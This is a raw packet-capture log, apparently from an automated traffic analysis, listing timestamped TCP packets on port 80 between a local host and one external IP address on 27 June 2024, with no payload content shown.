Jun 27, 2024 05:58:37.818284988 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818298101 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818316936 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818324089 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818324089 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818331003 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818345070 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818362951 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818367004 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818388939 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818537951 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818551064 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818564892 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818577051 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818615913 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818669081 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818684101 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818696976 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818708897 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818713903 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818727970 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818742990 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818752050 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818754911 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818769932 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818773985 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818783045 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818797112 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818802118 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818835020 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.818871021 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818883896 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818898916 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.818943024 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.870924950 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.870961905 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.870975018 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871018887 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871073008 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871118069 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871134996 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871150970 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871221066 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871330023 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871365070 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871377945 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871391058 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871402025 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871455908 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871607065 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871623039 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871666908 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871750116 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871763945 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871810913 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.871886969 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871900082 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.871983051 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872004032 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872018099 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872050047 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872163057 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872175932 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872242928 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872287989 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872306108 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872389078 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872420073 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872508049 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872534037 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872546911 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872560024 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872587919 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872587919 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.872864008 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872878075 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872968912 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872982979 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.872986078 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.873018026 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.873285055 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.873308897 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.873338938 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.873352051 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.873374939 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.873378038 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.873378038 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.873434067 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.900233984 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900270939 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900285959 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900312901 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.900386095 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900440931 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.900471926 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900494099 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900509119 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900561094 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.900806904 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900854111 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.900883913 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900898933 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.900935888 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.901056051 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901068926 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901082993 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901101112 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901118040 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.901212931 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.901360989 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901375055 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901391983 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901406050 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901421070 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.901456118 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.901669025 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901684046 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901698112 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.901742935 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.902329922 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902390957 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.902393103 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902405977 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902471066 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.902509928 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902523994 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902564049 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.902733088 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902746916 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902759075 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902771950 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902785063 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.902808905 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.902808905 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903043985 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903086901 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903270006 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903283119 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903295994 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903309107 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903321981 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903335094 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903348923 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903357983 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903357983 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903362989 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903377056 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903390884 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903393030 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903404951 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.903419018 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.903431892 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904135942 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904149055 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904161930 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904175997 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904195070 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904198885 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904198885 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904207945 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904221058 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904247999 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904252052 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904252052 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904262066 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904325008 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904762030 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904773951 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904788017 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904803991 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.904823065 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.904865980 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905060053 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905073881 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905086994 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905107021 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905117035 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905121088 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905134916 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905148029 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905160904 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905162096 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905175924 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905189037 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905230045 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905751944 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905766964 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905781031 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905795097 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.905833960 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.905833960 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.906169891 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906182051 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906194925 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906208992 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906223059 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906234980 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.906234980 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.906236887 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.906269073 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.951114893 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960175037 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960277081 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960292101 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960319042 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960330963 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960334063 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960361004 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960508108 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960520029 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960534096 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960557938 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960568905 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960731983 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960745096 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960787058 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960891008 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960903883 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960916996 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960930109 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960942984 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.960973024 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.960973024 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961241007 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961253881 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961267948 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961281061 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961287975 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961296082 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961334944 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961335897 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961595058 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961608887 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961622953 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961637020 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961667061 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961667061 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.961967945 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961983919 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.961997032 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962017059 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962029934 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962033987 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.962043047 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962058067 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962075949 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.962075949 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.962470055 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962485075 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962497950 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962511063 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962512016 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.962523937 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.962546110 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.962567091 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.986984015 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987025023 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987037897 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987098932 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.987138987 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987153053 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987165928 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987180948 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987214088 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.987214088 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.987390041 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987529039 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987586975 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987597942 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987662077 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.987715006 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987728119 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987741947 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987755060 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.987763882 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.987782001 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988137007 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988149881 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988163948 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988177061 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988192081 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988194942 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988194942 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988204956 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988248110 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988395929 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988409042 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988421917 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988461018 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988461018 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988533020 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988579988 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988594055 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988607883 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988620043 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988663912 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.988843918 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988856077 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988871098 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.988914967 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989083052 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989094973 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989108086 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989119053 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989137888 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989171028 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989336967 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989351034 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989365101 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989377975 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989392042 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989394903 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989394903 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989406109 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989423990 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989447117 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989492893 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.989960909 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989974976 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.989986897 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990004063 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990016937 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990030050 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990037918 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.990037918 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.990042925 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990056038 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990068913 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990087032 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990089893 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.990089893 CEST	49726	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:37.990103006 CEST	80	49726	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:37.990135908 CEST	49726	80	192.168.2.7	77.91.77.81
